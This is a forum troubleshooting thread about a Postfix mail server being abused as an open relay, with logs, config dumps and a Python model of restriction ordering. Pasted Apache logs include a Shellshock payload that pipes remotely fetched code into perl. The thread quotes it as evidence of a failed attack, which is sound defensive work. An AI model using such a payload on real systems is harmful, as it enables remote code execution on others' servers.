[SOLVED] SMTP under attack. Help?

Hello,

For a short while now (3 days) I have been the target of a cracker. Up to now the attack uses 3 known IP addresses:
iptables -I INPUT -s 108.178.61.228 -j DROP #spam
iptables -I INPUT -s 108.178.61.229 -j DROP #spam
iptables -I INPUT -s 198.143.132.2 -j DROP #spam
iptables -I INPUT -s 179.236.124.245 -j DROP #spam

The attacker sends e-mails from his server, uses my server as a relay for my own domain and sends them out.
I do not understand how the attacker can send e-mails without having to log in over SMTP.

An extract from the mail log:

Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: BD9BD58CB46F: from=<hbdbd5@MYDOMAIN.COM>, size=1220, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: 4B18E58DFCD4: removed
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: B733E58C411B: from=<yuehr@MYDOMAIN.COM>, size=1645, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: BC3D858CEB1D: from=<ztjg1ilt@MYDOMAIN.COM>, size=1111, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/error[7917]: 3D29D58D0093: to=<aureliopereira22@hotmail.com>, relay=none, delay=181855, delays=181079/775/0/0.73, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7867]: 3A55158DC324: to=<luan.nextel@hotmail.com>, relay=none, delay=9889, delays=9113/775/0/0.93, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7369]: 36D2A58C839D: to=<eloina_f_silva@hotmail.com>, relay=none, delay=283587, delays=282811/774/0/1.5, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7360]: 3495958C8761: to=<mariasaraiva94@hotmail.com>, relay=none, delay=282674, delays=281898/775/0/0.55, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7392]: 3847E58D6CEB: to=<claysin_bts@hotmail.com>, relay=none, delay=106725, delays=105949/774/0/1.7, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7352]: 3C4DF59222C7: to=<marlon787@hotmail.com>, relay=none, delay=9625, delays=8849/775/0/1.1, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7868]: AACCA5940920: to=<elinewalc@hotmail.com>, relay=none, delay=777, delays=2.2/775/0/0.17, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7916]: C33515940921: to=<cris_sa@hotmail.com>, relay=none, delay=777, delays=2.4/775/0/0.17, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/smtp[7616]: 368C6590406B: to=<mrmarina@uol.com.br>, relay=mx.uol.com.br[200.147.36.15]:25, conn_use=4, delay=33035, delays=32132/902/0.25/0.65, dsn=4.7.1, status=deferred (host mx.uol.com.br[200.147.36.15] said: 450 4.7.1 <mrmarina@uol.com.br>: Recipient address rejected: MX-UOL-04 - Too many messages, try again later. (in reply to RCPT TO command))
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: BD30358CF5A5: from=<a7zbsltj@MYDOMAIN.COM>, size=1160, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: BECAB5924EFE: from=<mxpny9yg@MYDOMAIN.COM>, size=1136, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/smtpd[7903]: warning: restriction `permit_mynetworks' after `permit' is ignored

My server is already being blocked by several blocklists.
I have made several changes to the settings and it seems that the attacker is unable to send e-mails now. But on the other hand, I am unable to send e-mail also.

My current biggest concern is:

  • what is impacted? Only postfix or might other systems be affected also?
  • how can the attacker send without username and password?
  • how can I counter this?
  • any passwords I should change?
  • why can’t I send? The current logs are like this:

Oct 30 22:43:59 exalt2 postfix/smtpd[18981]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 30 22:43:59 exalt2 postfix/smtpd[18981]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 30 22:44:00 exalt2 postfix/smtpd[18981]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 30 22:44:00 exalt2 postfix/smtpd[18981]: disconnect from unknown[179.236.124.245]
Oct 30 22:44:09 exalt2 postfix/smtpd[18309]: connect from static.240.54.251.148.clients.your-server.de[148.251.54.240]
Oct 30 22:44:09 exalt2 postfix/smtpd[18309]: disconnect from static.240.54.251.148.clients.your-server.de[148.251.54.240]
Oct 30 22:45:09 exalt2 postfix/smtpd[18309]: connect from static.240.54.251.148.clients.your-server.de[148.251.54.240]
Oct 30 22:45:09 exalt2 postfix/smtpd[18309]: disconnect from static.240.54.251.148.clients.your-server.de[148.251.54.240]
Oct 30 22:45:12 exalt2 postfix/smtpd[18981]: connect from MY.REVERSE.DOMAIN[my.home.ip]
Oct 30 22:45:13 exalt2 postfix/smtpd[18981]: warning: support for restriction "check_relay_domains" will be removed from Postfix; use "reject_unauth_destination" instead
Oct 30 22:45:13 exalt2 postfix/smtpd[18981]: NOQUEUE: reject: RCPT from MY.REVERSE.DOMAIN[my.home.ip]: 554 5.7.1 <XXXXXX@gmail.com>: Recipient address rejected: Relay access denied; from=<remi@MYDOMAIN.COM> to=<XXXXXX@gmail.com> proto=ESMTP helo=<[192.168.3.100]>
Oct 30 22:45:13 exalt2 postfix/smtpd[18981]: disconnect from MY.REVERSE.DOMAIN[my.home.ip]

Any help is greatly appreciated!

At the moment I am not receiving logs anymore of spam being sent. The only thing I still see is this:

Oct 30 23:04:15 exalt2 postfix/smtpd[22637]: warning: 179.236.124.245: hostname 179236124245.user.veloxzone.com.br verification failed: Name or service not known
Oct 30 23:04:15 exalt2 postfix/smtpd[22637]: connect from unknown[179.236.124.245]
Oct 30 23:04:16 exalt2 postfix/smtpd[22637]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 30 23:04:16 exalt2 postfix/smtpd[22637]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 30 23:04:17 exalt2 postfix/smtpd[22637]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 30 23:04:17 exalt2 postfix/smtpd[22637]: disconnect from unknown[179.236.124.245]

I still do not understand, however, what I did that makes them unable to send. Does “Cannot find your hostname” mean that any user on my server without a hostname would also be refused?
How likely is this?
How can I still improve security?

Is there a way I can easily activate the following option:

#relay_recipient_maps = hash:/etc/postfix/relay_recipients

If Virtualmin could dynamically add newly created mailboxes to it, that would be great …

----edit

I found that there is such a list: /etc/postfix/virtual
I will enable the following command in the /etc/postfix/main.cf:

relay_recipient_maps = hash:/etc/postfix/virtual

Howdy,

If you have any of those emails in your queue, you may want to review the email headers to get a better idea of what’s going on and how they’re getting in there.

It should not be possible to relay emails through your server, unless someone has guessed a password of one of your users.

Another option is that they could be accessing your server via a website containing a vulnerability of some sort.

What is the output of the command “postconf -n”? We can review that to see if there is anything unusual or insecure regarding your server’s Postfix installation (feel free to edit out your actual domain names).

-Eric

Hey Eric,

Thanks again for your reply.
Is it possible for an attacker to get the password due to the recent poodlebleed technique?
How can I verify with which account the attacker attempts to log in?
I emptied the whole queue, so there are no more malicious e-mails in there, but I see I am still getting plenty of attempts, even though I blocked the IPs in iptables.

Oct 31 21:00:13 exalt2 postfix/smtpd[9920]: warning: 179.236.124.245: hostname 179236124245.user.veloxzone.com.br verification failed: Name or service not known
Oct 31 21:00:13 exalt2 postfix/smtpd[9920]: connect from unknown[179.236.124.245]
Oct 31 21:00:14 exalt2 postfix/smtpd[9920]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 31 21:00:14 exalt2 postfix/smtpd[9920]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 31 21:00:15 exalt2 postfix/smtpd[9920]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 31 21:00:15 exalt2 postfix/smtpd[9920]: disconnect from unknown[179.236.124.245]

In the secure log I see this a lot:

Oct 31 21:00:04 SERVER su: PAM unable to dlopen(/lib64/security/pam_fprintd.so): /lib64/security/pam_fprintd.so: cannot open shared object file: No such file or directory
Oct 31 21:00:04 SERVER su: PAM adding faulty module: /lib64/security/pam_fprintd.so
Oct 31 21:00:04 SERVER su: pam_unix(su:session): session opened for user postgres by (uid=0)
Oct 31 21:00:04 SERVER su: pam_unix(su:session): session closed for user postgres
Oct 31 21:00:04 SERVER su: PAM unable to dlopen(/lib64/security/pam_fprintd.so): /lib64/security/pam_fprintd.so: cannot open shared object file: No such file or directory
Oct 31 21:00:04 SERVER su: PAM adding faulty module: /lib64/security/pam_fprintd.so
Oct 31 21:00:04 SERVER su: pam_unix(su:session): session opened for user postgres by (uid=0)
Oct 31 21:00:04 SERVER su: pam_unix(su:session): session closed for user postgres
Could this be related?

In the apache logs I see no POSTS (is this logged by default?)
I only see failed attacks:

[Sun Oct 26 23:54:42 2014] [error] [client 95.183.244.244] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Mon Oct 27 00:58:49 2014] [error] [client 46.4.97.132] File does not exist: /var/www/html/cgi-sys, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Mon Oct 27 00:58:49 2014] [error] [client 46.4.97.132] File does not exist: /var/www/html/cgi-sys, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Mon Oct 27 00:58:49 2014] [error] [client 46.4.97.132] File does not exist: /var/www/html/xul, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Mon Oct 27 00:58:49 2014] [error] [client 46.4.97.132] script not found or unable to stat: /var/www/cgi-bin/status, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Mon Oct 27 07:51:39 2014] [error] [client 216.24.87.106] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /tmUnblock.cgi
[Mon Oct 27 17:55:39 2014] [error] [client 76.168.154.151] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /tmUnblock.cgi
[Mon Oct 27 21:16:18 2014] [error] [client 211.24.26.250] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /tmUnblock.cgi
[Mon Oct 27 22:47:17 2014] [error] [client 8.17.32.62] File does not exist: /var/www/html/recordings
[Tue Oct 28 02:43:12 2014] [error] [client 50.152.10.61] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /tmUnblock.cgi
[Tue Oct 28 03:51:09 2014] [error] [client 31.222.163.233] File does not exist: /var/www/html/cgi-bin-sdb, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Tue Oct 28 03:51:09 2014] [error] [client 31.222.163.233] File does not exist: /var/www/html/cgi-mod, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Tue Oct 28 03:51:09 2014] [error] [client 31.222.163.233] File does not exist: /var/www/html/cgi-sys, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Tue Oct 28 03:51:09 2014] [error] [client 31.222.163.233] File does not exist: /var/www/html/cgi-sys, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
body.xml:1: parser error : Document labelled UTF-16 but has UTF-8 content

<?xml version="1.0" encoding="utf-16" standalone="yes"?>
                                 ^


[Thu Oct 30 22:59:32 2014] [error] [client 125.64.35.67] File does not exist: /var/www/html/zc
[Thu Oct 30 23:04:26 2014] [error] [client 88.6.208.233] File does not exist: /var/www/html/riri
[Thu Oct 30 23:04:26 2014] [error] [client 88.6.208.233] File does not exist: /var/www/html/phpMyAdmin
[Thu Oct 30 23:04:26 2014] [error] [client 88.6.208.233] File does not exist: /var/www/html/pma
[Thu Oct 30 23:04:26 2014] [error] [client 88.6.208.233] File does not exist: /var/www/html/myadmin

(Isn’t there a possibility to create an automated blocklist in iptables for IPs that attempt to execute files in the /var/www/html dir?)

The output:

postconf -n
alias_database = hash:/etc/aliases
alias_maps = hash:/etc/aliases
allow_percent_hack = no
broken_sasl_auth_clients = yes
command_directory = /usr/sbin
config_directory = /etc/postfix
daemon_directory = /usr/libexec/postfix
data_directory = /var/lib/postfix
debug_peer_level = 2
disable_vrfy_command = yes
home_mailbox = Maildir/
html_directory = no
inet_interfaces = all
inet_protocols = ipv4
mail_owner = postfix
mailbox_command = /usr/bin/procmail-wrapper -o -a $DOMAIN -d $LOGNAME
mailbox_size_limit = 0
mailq_path = /usr/bin/mailq.postfix
manpage_directory = /usr/share/man
mydestination = $myhostname, localhost.$mydomain, localhost, MY.DOMAIN.COM
newaliases_path = /usr/bin/newaliases.postfix
queue_directory = /var/spool/postfix
readme_directory = /usr/share/doc/postfix-2.6.6/README_FILES
relay_recipient_maps = hash:/etc/postfix/virtual
sample_directory = /usr/share/doc/postfix-2.6.6/samples
sender_bcc_maps = hash:/etc/postfix/bcc
sendmail_path = /usr/sbin/sendmail.postfix
setgid_group = postdrop
smtpd_banner = smtp
smtpd_helo_required = yes
smtpd_recipient_restrictions = reject_rbl_client zen.spamhaus.org permit_mynetworks permit reject_unauth_destination
smtpd_sasl_auth_enable = yes
smtpd_sender_restrictions = reject_unknown_client reject_invalid_hostname reject_unknown_sender_domain
smtpd_tls_CAfile = /etc/postfix/postfix.ca.pem
smtpd_tls_auth_only = yes
smtpd_tls_cert_file = /etc/postfix/postfix.cert.pem
smtpd_tls_key_file = /etc/postfix/postfix.key.pem
smtpd_tls_mandatory_ciphers = high
smtpd_tls_mandatory_protocols = !SSLv2, !SSLv3
smtpd_tls_security_level = may
unknown_local_recipient_reject_code = 550
virtual_alias_maps = hash:/etc/postfix/virtual

Hello Welschman, it is possible, but I doubt it. The mails are being sent from another server to my SMTP server. The mails are not locally created. I am also running 2 file integrity checks, rkhunter, lmd and cfs. I had no messages, whereas I used to get these kinds of attacks, and they were spotted very rapidly…

It’s happening again :frowning:
These are the headers:

Received: from TARWADAEX (mail.Sheffield.ae [91.73.219.154]) by MY.DOMAIN.COM (Postfix) with ESMTP id C167E58C06D8 for <joneslarry481@gmail.com>; Tue, 4 Nov 2014 18:23:03 +0100 (CET)
MIME-Version: 1.0
From: admin@goodservers.com
To: joneslarry481@gmail.com
Date: 4 Nov 2014 21:34:04 +0400
Subject: 144.76.127.234,mail,mail

The following showed in the logs:

Nov 4 19:58:03 exalt2 postfix/smtpd[15978]: connect from mail.tarwada.ae[91.73.219.154]
Nov 4 19:58:03 exalt2 postfix/smtpd[15978]: warning: restriction `reject_unauth_destination' after `permit' is ignored
Nov 4 19:58:04 exalt2 postfix/smtpd[15978]: 007D458C01BC: client=mail.tarwada.ae[91.73.219.154]
Nov 4 19:58:05 exalt2 postfix/smtpd[15996]: connect from mail.Sheffield.ae[91.73.219.154]
Nov 4 19:58:05 exalt2 postfix/smtpd[15996]: lost connection after CONNECT from mail.Sheffield.ae[91.73.219.154]
Nov 4 19:58:05 exalt2 postfix/smtpd[15996]: disconnect from mail.Sheffield.ae[91.73.219.154]
Nov 4 19:58:06 exalt2 postfix/smtpd[15996]: connect from mail.tarwada.ae[91.73.219.154]
Nov 4 19:58:07 exalt2 postfix/smtpd[15996]: warning: restriction `reject_unauth_destination' after `permit' is ignored
Nov 4 19:58:07 exalt2 postfix/smtpd[15996]: EAA2958C1317: client=mail.tarwada.ae[91.73.219.154]
Nov 4 19:58:09 exalt2 postfix/cleanup[16005]: EAA2958C1317: message-id=<>
Nov 4 19:58:09 exalt2 postfix/qmgr[31563]: EAA2958C1317: from=<admin@goodservers.com>, size=348, nrcpt=1 (queue active)
Nov 4 19:58:11 exalt2 postfix/smtp[16008]: EAA2958C1317: host gmail-smtp-in.l.google.com[64.233.161.27] said: 421-4.7.0 [XXX.XXX.XXX.XXX 15] Our system has detected an unusual rate of 421-4.7.0 unsolicited mail originating from your IP address. To protect our 421-4.7.0 users from spam, mail sent from your IP address has been temporarily 421-4.7.0 rate limited. Please visit 421-4.7.0 http://www.google.com/mail/help/bulk_mail.html to review our Bulk 421 4.7.0 Email Senders Guidelines. qi2si2225793lbb.47 - gsmtp (in reply to end of DATA command)
Nov 4 19:58:13 exalt2 postfix/smtp[16008]: EAA2958C1317: to=<joneslarry481@gmail.com>, relay=alt1.gmail-smtp-in.l.google.com[64.233.168.27]:25, delay=5.3, delays=1.6/0.01/2.6/1, dsn=4.7.0, status=deferred (host alt1.gmail-smtp-in.l.google.com[64.233.168.27] said: 421-4.7.0 [XXX.XXX.XXX.XXX 15] Our system has detected an unusual rate of 421-4.7.0 unsolicited mail originating from your IP address. To protect our 421-4.7.0 users from spam, mail sent from your IP address has been temporarily 421-4.7.0 rate limited. Please visit 421-4.7.0 http://www.google.com/mail/help/bulk_mail.html to review our Bulk 421 4.7.0 Email Senders Guidelines. pn6si1418211obb.17 - gsmtp (in reply to end of DATA command))
Nov 4 19:58:14 exalt2 postfix/cleanup[15995]: 007D458C01BC: message-id=<20141104225804.16907@localhost.localdomain>
Nov 4 19:58:14 exalt2 postfix/qmgr[31563]: 007D458C01BC: from=<admin@goodservers.com>, size=406, nrcpt=1 (queue active)
Nov 4 19:58:16 exalt2 postfix/smtp[16008]: 007D458C01BC: to=<joneslarry481@gmail.com>, relay=gmail-smtp-in.l.google.com[64.233.161.27]:25, delay=13, delays=11/0/0.17/2.1, dsn=2.0.0, status=sent (250 2.0.0 OK 1415127496 oi5si2023651lbb.135 - gsmtp)
Nov 4 19:58:16 exalt2 postfix/qmgr[31563]: 007D458C01BC: removed
Nov 4 19:58:56 exalt2 postfix/smtpd[15996]: disconnect from mail.tarwada.ae[91.73.219.154]
Nov 4 19:58:56 exalt2 postfix/smtpd[15978]: disconnect from mail.tarwada.ae[91.73.219.154]

I really need to stop these attacks. Any help is very welcome!
How can they log in?
How can they even send? I set the “Map for allowed addresses for relaying” to hash:/etc/postfix/virtual. This way it should only allow to send mail from e-mail accounts which were created on the mail server…

According to the MX Toolbox my postfix ‘might’ be set up as an open relay.
How can I make it a closed relay?

I tried to add the following parameters to main.cf:
smtpd_sasl_security_options = noanonymous
smtpd_sasl_tls_security_options = noanonymous
smtpd_sasl_type = dovecot
smtpd_sender_restrictions =permit_sasl_authenticated

However, then I get the following error in the log:

Nov 4 20:45:42 exalt2 postfix/smtpd[21660]: warning: SASL: Connect to smtpd failed: No such file or directory
Nov 4 20:45:42 exalt2 postfix/smtpd[21660]: fatal: no SASL authentication mechanisms
Nov 4 20:45:43 exalt2 postfix/master[21629]: warning: process /usr/libexec/postfix/smtpd pid 21660 exit status 1
Nov 4 20:45:43 exalt2 postfix/master[21629]: warning: /usr/libexec/postfix/smtpd: bad command startup -- throttling

How should I interpret this? Is SASL not running or not configured? I am lost.

What you may want to try is go back to a basic/standard “smtpd_recipient_restrictions” line, and see if that resolves the issue. If so, then you can make some tweaks to it to harden it up a bit. But I’m wondering if your current smtpd_recipient_restrictions line is allowing relaying through your system.

My suggestion would be to replace you current line with this one, and then restart Postfix:

smtpd_recipient_restrictions = permit_mynetworks permit_sasl_authenticated reject_unauth_destination

Hey Eric,

My restrictions are:
smtpd_recipient_restrictions = reject_rbl_client zen.spamhaus.org permit_mynetworks permit reject_unauth_destination permit_sasl_authenticated

I removed the “permit” but then I’m not allowed to send:

Nov  4 21:40:10 exalt2 postfix/smtpd[30289]: connect from XX.XX.XX.XX.access.reverse.ip[xx.xx.xx.xx]
Nov  4 21:40:11 exalt2 postfix/smtpd[30289]: NOQUEUE: reject: RCPT from XX.XX.XX.XX.access.reverse.ip[xx.xx.xx.xx]: 554 5.7.1 <destination@gmail.com>: Relay access denied; from=<origin@MYDOMAIN.COM> to=<destination@gmail.com> proto=ESMTP helo=<[192.168.3.100]>
Nov  4 21:40:11 exalt2 postfix/smtpd[30289]: disconnect from XX.XX.XX.XX.access.reverse.ip[xx.xx.xx.xx]

I don’t see why the relay access has been denied though…

okay, I am a bit further now I think.
I removed the “permit” and I am still able to send from my webmail.
SMTP does not work yet though.
I noted there is no such file or directory: /var/spool/postfix/private/auth The lowest I could go was /var/spool/postfix/private/.
Could this be an indication to the problem?

Great, so it appears I got SASL working with the following:

/etc/dovecot/conf.d/10-master.conf
for the line

unix_listener private/auth

change it to

unix_listener /var/spool/postfix/private/auth

Restart dovecot and try again.

However, I am still having problems:
I can send from the webmail, but it refuses to send from smtp.
logs added:

##### via smtp:
Nov  7 11:11:56 exalt2 postfix/smtpd[8307]: connect from XX.XX.XX.XX.my.reverse.ip[XX.XX.XX.XX]
Nov  7 11:11:56 exalt2 postfix/smtpd[8307]: NOQUEUE: reject: RCPT from XX.XX.XX.XX.my.reverse.ip[XX.XX.XX.XX]: 554 5.7.1 <destination@gmail.com>: Recipient address rejected: Relay access denied; from=<username@MYDOMAIN.COM> to=<destination@gmail.com> proto=ESMTP helo=<[192.168.3.100]>
Nov  7 11:11:56 exalt2 postfix/smtpd[8307]: warning: restriction `permit_mynetworks' after `check_relay_domains' is ignored
Nov  7 11:11:56 exalt2 postfix/smtpd[8307]: disconnect from XX.XX.XX.XX.my.reverse.ip[XX.XX.XX.XX]

##### Via webmail:
Nov  7 11:12:38 exalt2 postfix/smtpd[8307]: connect from localhost[127.0.0.1]
Nov  7 11:12:38 exalt2 postfix/smtpd[8307]: warning: restriction `permit_mynetworks' after `check_relay_domains' is ignored
Nov  7 11:12:38 exalt2 postfix/smtpd[8307]: 5188B58C069E: client=localhost[127.0.0.1], sasl_method=LOGIN, sasl_username=username.virtualServerAccountName
Nov  7 11:12:38 exalt2 postfix/cleanup[8585]: 5188B58C069E: message-id=<b55cf923eff6614e0e255a9897dbfd0a@MYDOMAIN.COM>
Nov  7 11:12:38 exalt2 postfix/qmgr[8222]: 5188B58C069E: from=<username@MYDOMAIN.COM>, size=1414, nrcpt=1 (queue active)
Nov  7 11:12:38 exalt2 postfix/smtpd[8307]: disconnect from localhost[127.0.0.1]
Nov  7 11:12:39 exalt2 postfix/smtp[8587]: 5188B58C069E: to=<destination@gmail.com>, relay=gmail-smtp-in.l.google.com[173.194.65.26]:25, delay=1, delays=0.2/0.01/0.18/0.61, dsn=2.0.0, status=sent (250 2.0.0 OK 1415355159 wo10si14454591wjc.32 - gsmtp)
Nov  7 11:12:39 exalt2 postfix/qmgr[8222]: 5188B58C069E: removed

Great. I found the problem.

Apparently it is an issue of the order in which you put the parameters for smtpd_recipient_restrictions and smtpd_sender_restrictions.
These are my current ones, and they work:

smtpd_sender_restrictions = permit_mynetworks permit_sasl_authenticated reject_unknown_client, reject_invalid_hostname, reject_unknown_sender_domain, reject_unlisted_sender
smtpd_recipient_restrictions = permit_mynetworks permit_sasl_authenticated reject_rbl_client zen.spamhaus.org reject_unauth_destination

This is my postconf -n:

# postconf -n
alias_database = hash:/etc/aliases
alias_maps = hash:/etc/aliases
allow_percent_hack = no
broken_sasl_auth_clients = yes
command_directory = /usr/sbin
config_directory = /etc/postfix
daemon_directory = /usr/libexec/postfix
data_directory = /var/lib/postfix
debug_peer_level = 2
disable_vrfy_command = yes
home_mailbox = Maildir/
html_directory = no
inet_interfaces = all
inet_protocols = ipv4
mail_owner = postfix
mailbox_command = /usr/bin/procmail-wrapper -o -a $DOMAIN -d $LOGNAME
mailbox_size_limit = 0
mailq_path = /usr/bin/mailq.postfix
manpage_directory = /usr/share/man
mydestination = $myhostname, localhost.$mydomain, localhost, MY.DOMAIN.COM
newaliases_path = /usr/bin/newaliases.postfix
queue_directory = /var/spool/postfix
readme_directory = /usr/share/doc/postfix-2.6.6/README_FILES
relay_recipient_maps = hash:/etc/postfix/virtual
sample_directory = /usr/share/doc/postfix-2.6.6/samples
sender_bcc_maps = hash:/etc/postfix/bcc
sendmail_path = /usr/sbin/sendmail.postfix
setgid_group = postdrop
smtpd_banner = smtp
smtpd_recipient_restrictions = permit_mynetworks permit_sasl_authenticated reject_rbl_client zen.spamhaus.org reject_unauth_destination
smtpd_sasl_auth_enable = yes
smtpd_sasl_path = private/auth
smtpd_sasl_type = dovecot
smtpd_sender_restrictions = permit_mynetworks permit_sasl_authenticated reject_unknown_client, reject_invalid_hostname, reject_unknown_sender_domain, reject_unlisted_sender
smtpd_tls_CAfile = /etc/postfix/postfix.ca.pem
smtpd_tls_auth_only = yes
smtpd_tls_cert_file = /etc/postfix/postfix.cert.pem
smtpd_tls_key_file = /etc/postfix/postfix.key.pem
smtpd_tls_mandatory_ciphers = high
smtpd_tls_security_level = may
unknown_local_recipient_reject_code = 550
virtual_alias_maps = hash:/etc/postfix/virtual
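The ordering problem the post above found, as an added example (not code from the thread or from Postfix): a small Python model of how smtpd walks smtpd_recipient_restrictions left to right, run over the thread's original and corrected lines. It assumes a placeholder mydestination and treats every restriction other than permit, permit_mynetworks, permit_sasl_authenticated, reject_rbl_client and reject_unauth_destination as DUNNO (no decision, keep walking).

```python
"""Model of Postfix smtpd_recipient_restrictions evaluation (added example).

Postfix walks the list left to right; the first restriction that returns
OK (permit) or REJECT decides, everything else returns DUNNO and evaluation
moves on. A bare `permit` always returns OK, so nothing listed after it can
ever run, which is what the thread's "restriction `reject_unauth_destination'
after `permit' is ignored" warning means.
"""
import re

# Constructed from the thread: the line that relayed the spam, and the fix.
OPEN_RELAY = ("reject_rbl_client zen.spamhaus.org permit_mynetworks permit "
              "reject_unauth_destination permit_sasl_authenticated")
FIXED = ("permit_mynetworks permit_sasl_authenticated "
         "reject_rbl_client zen.spamhaus.org reject_unauth_destination")

# Assumed local domains (placeholder for the thread's mydestination).
MYDESTINATION = {"mydomain.com", "localhost"}

# Restrictions that take one argument, so the tokenizer keeps it attached.
WITH_ARG = {"reject_rbl_client", "check_client_access", "check_sender_access",
            "check_recipient_access", "check_helo_access"}


def tokenize(restrictions):
    """Split a space- or comma-separated restriction list into (name, arg) pairs."""
    toks = [t for t in re.split(r"[\s,]+", restrictions.strip()) if t]
    out, i = [], 0
    while i < len(toks):
        name = toks[i]
        if name in WITH_ARG:
            out.append((name, toks[i + 1] if i + 1 < len(toks) else None))
            i += 2
        else:
            out.append((name, None))
            i += 1
    return out


def evaluate(restrictions, client):
    """Return (decision, deciding_restriction) for one RCPT TO.

    client: dict with in_mynetworks (bool), sasl (bool), rcpt_domain (str)
    and optionally dnsbl_listed (set of DNSBL zones the client IP is on).
    """
    for name, arg in tokenize(restrictions):
        if name == "permit":
            return "OK", name                      # unconditional, ends the walk
        if name == "permit_mynetworks" and client["in_mynetworks"]:
            return "OK", name
        if name == "permit_sasl_authenticated" and client["sasl"]:
            return "OK", name
        if name == "reject_rbl_client" and arg in client.get("dnsbl_listed", set()):
            return "REJECT", name
        if name == "reject_unauth_destination" and client["rcpt_domain"] not in MYDESTINATION:
            return "REJECT", name                  # relaying to a foreign domain
        # anything else, or a non-matching restriction, is DUNNO: keep walking
    return "OK", "end-of-list"                     # Postfix default when nothing decided


def unreachable(restrictions):
    """Restriction names that can never run because a bare `permit` precedes them."""
    names = [n for n, _ in tokenize(restrictions)]
    return names[names.index("permit") + 1:] if "permit" in names else []


if __name__ == "__main__":
    # An unauthenticated outside host asking to relay to gmail.com.
    stranger = {"in_mynetworks": False, "sasl": False, "rcpt_domain": "gmail.com"}
    for label, line in (("open relay", OPEN_RELAY), ("fixed", FIXED)):
        print(f"{label:10s} -> {evaluate(line, stranger)}  unreachable={unreachable(line)}")
```

Postfix 2.6 refuses to start unless reject_unauth_destination (or an equivalent) appears somewhere in smtpd_recipient_restrictions, which the original line satisfied on paper while the preceding `permit` made it unreachable.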

Probably been hacked and a file put on the server; I had a client recently with a footer.php file suddenly appearing in a WP tinymce folder. Check the headers, if you can, to see where the generated mail is coming from.